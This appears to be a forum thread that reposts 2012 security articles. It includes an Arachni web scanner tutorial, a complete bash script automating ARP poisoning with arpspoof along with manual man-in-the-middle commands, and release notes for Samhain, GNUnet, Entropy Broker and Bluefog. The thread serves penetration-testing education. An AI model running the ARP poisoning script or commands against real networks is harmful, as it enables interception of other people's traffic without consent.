Web application hacking is very common and there are many tools that can exploit web application vulnerabilities like SQL injection, XSS, RFI, LFI and others. The very first step is to find the vulnerabilities in the web application. Arachni is a feature-full, modular, high-performance Ruby framework aimed towards helping penetration testers and administrators evaluate the security of web applications. In this article I will show you how to get and install Arachni and how to launch your first scan against a web application.
Download Arachni
I am on Backtrack 5 R1, but you can use another Linux distribution like Ubuntu. Start the web interface of Arachni:
root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_web
Next you need to add a Dispatcher, because the Arachni web interface does not work without one. Start the dispatcher daemon with:
root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni_rpcd
Now click on the plugins tab to choose the plugins you want, then click on the modules tab to select or deselect modules depending on your needs. Finally, click on "Start Scan", enter the URL of the target web application and start the attack; after some time you can evaluate the report to see the vulnerabilities that were found.
Source: Arachni Web Application Security Scanner Framework Tutorial | Ethical Hacking-Your Way To The World Of IT Security
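If you prefer the command line over the web interface, a basic scan can presumably be started with the bundled command-line launcher along these lines. The launcher name, the target URL and the assumption that the CDE package ships an arachni script next to arachni_web are illustrative only, so check the package contents and the launcher's --help output for your version.

root@bt:~/Downloads/arachni-v0.4.0.2-cde# sh arachni http://192.168.1.100/dvwa/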
-
[h=2]ARP Poisoning Script[/h]The purpose of this script is to automate the process of ARP poisoning attacks. The attacker only has to insert the IP address of the target and the IP of the gateway. This script was coded by Travis Phillips and you can find the source code below:

#!/bin/bash
niccard=eth1

if [[ $EUID -ne 0 ]]; then
   echo -e "\n\t\t\t\033[1m\033[31m Script must be run as root! \033[0m \n"
   echo -e "\t\t\t Example: sudo $0 \n"
   exit 1
else
   echo -e "\n\033[1;32m#######################################"
   echo -e "#          ARP Poison Script          #"
   echo -e "#######################################"
   echo -e " \033[1;31mCoded By:\033[0m Travis Phillips"
   echo -e " \033[1;31mDate Released:\033[0m 03/27/2012"
   echo -e " \033[1;31mWebsite:\033[0m http://theunl33t.blogspot.com\n\033[0m"
   echo -n "Please enter target's IP: "
   read victimIP
   echo -n "Please enter Gateway's IP: "
   read gatewayIP
   echo -e "\n\t\t ---===[Time to Pwn]===---\n\n\n"
   echo -e "\t\t--==[Targets]==--"
   echo -e "\t\tTarget: $victimIP"
   echo -e "\t\tGateway: $gatewayIP \n\n"
   echo -e " [*] Enabling IP Forwarding \n"
   echo "1" > /proc/sys/net/ipv4/ip_forward
   echo -e " [*] Starting ARP Poisoning between $victimIP and $gatewayIP! \n"
   xterm -e "arpspoof -i $niccard -t $victimIP $gatewayIP" &
fi

[Image: ARP poison script]
Source: https://pentestlab.wordpress.com/2012/12/22/arp-poisoning-script/
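For reference, the manual equivalent of what the script automates looks roughly like the commands below; the interface and the two IP addresses are placeholders. Note that the script as published only poisons the victim-to-gateway direction, so for a full man-in-the-middle you would typically run a second arpspoof instance for the reverse direction (or use the -r switch, if your dsniff build supports it).

echo 1 > /proc/sys/net/ipv4/ip_forward
arpspoof -i eth1 -t 192.168.1.50 192.168.1.1    # victim now resolves the gateway IP to our MAC
arpspoof -i eth1 -t 192.168.1.1 192.168.1.50    # gateway now resolves the victim IP to our MAC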
-
[h=1]Samhain 3.0.9![/h]
by Mayuresh on December 22, 2012
For open source HIDS lovers, we have an updated release of Samhain! This is the bugfix release, Samhain version 3.0.9! Our original post about Samhain can be found here.
Samhain 3.0.9
“The Samhain open source host-based intrusion detection system (HIDS) provides file integrity checking and logfile monitoring/analysis, as well as rootkit detection, port monitoring, detection of rogue SUID executables, and hidden processes. It has been designed to monitor multiple hosts with potentially different operating systems, providing centralized logging and maintenance, although it can also be used as a standalone application on a single host. Samhain is an open-source multiplatform application for POSIX systems (Unix, Linux, Cygwin/Windows).”
Official change log for Samhain 3.0.9:
Some build errors have been fixed.
The ‘probe’ command for the server has been fixed (clients could be erroneously omitted under certain conditions).
An option ‘IgnoreTimestampsOnly’ has been added to the Windows registry check (ignore changes if only the timestamp has changed).
Full scans requested by the inotify module will now only run at times configured for full scans anyway.
[h=3]Download Samhain:[/h]
Samhain 3.0.9 – samhain-current.tar.gz/samhain-3.0.9.tar.gz
Source: Samhain version 3.0.9! — PenTestIT
-
GNUnet P2P Framework 0.9.5
Authored by Christian Grothoff | Site ovmj.org
GNUnet is a peer-to-peer framework with a focus on providing security. All peer-to-peer messages in the network are confidential and authenticated. The framework provides a transport abstraction layer and can currently encapsulate the network traffic in UDP (IPv4 and IPv6), TCP (IPv4 and IPv6), HTTP, or SMTP messages. GNUnet supports accounting to provide contributing nodes with better service. The primary service built on top of the framework is anonymous file sharing.
Changes: This release adds support for non-anonymous data transfers over multiple hops (if both publisher and replicator are using an anonymity level of zero). It fixes various bugs and includes cosmetic improvements in the gnunet-setup and gnunet-fs-gtk user interfaces.
Download: http://packetstormsecurity.org/files/download/119046/gnunet-0.9.5.tar.gz
Source: GNUnet P2P Framework 0.9.5 ≈ Packet Storm
-
Entropy Broker RNG 2.1
Authored by Folkert van Heusden | Site vanheusden.com
Entropy Broker is an infrastructure for distributing cryptographically secure random numbers (entropy data) from one or more servers to one or more clients. Entropy Broker allows you to distribute entropy data (random values) to the /dev/random devices of other systems (real servers or virtualised systems). It helps prevent the /dev/random device from becoming depleted; an empty /dev/random device can cause programs to hang (waiting for entropy data to become available). This is useful for systems that need to generate encryption keys, run VPN software or run a casino website.
Changes: This release adds a Web interface for viewing usage statistics, per-user bandwidth limits, and many small fixes.
Download: http://packetstormsecurity.org/files/download/119047/eb-2.1.tgz
Source: Entropy Broker RNG 2.1 ≈ Packet Storm
-
Bluefog 0.0.2
Authored by Tom Nardi | Site digifail.com
Bluefog is a tool that can generate an essentially unlimited number of phantom Bluetooth devices. It can be used to test Bluetooth scanning and monitoring systems, make it more difficult for attackers to lock onto your devices, or otherwise complicate the normal operation of Bluetooth devices. Technically, Bluefog can work with just one Bluetooth adapter, but it works much better when you connect multiple adapters. Up to four radios are currently supported simultaneously.
Changes: This release is in the very early stages of development, and there are some areas of the software which need attention and improvement. There is currently very little in the way of error checking.
Download: http://packetstormsecurity.org/files/download/119045/bluefog-0.0.2.tar.gz
Source: Bluefog 0.0.2 ≈ Packet Storm
-
There is secimg.php for images, both in posts and in signatures. As for anonymizing links (the referrer)... You haven't specified WHY it would be necessary.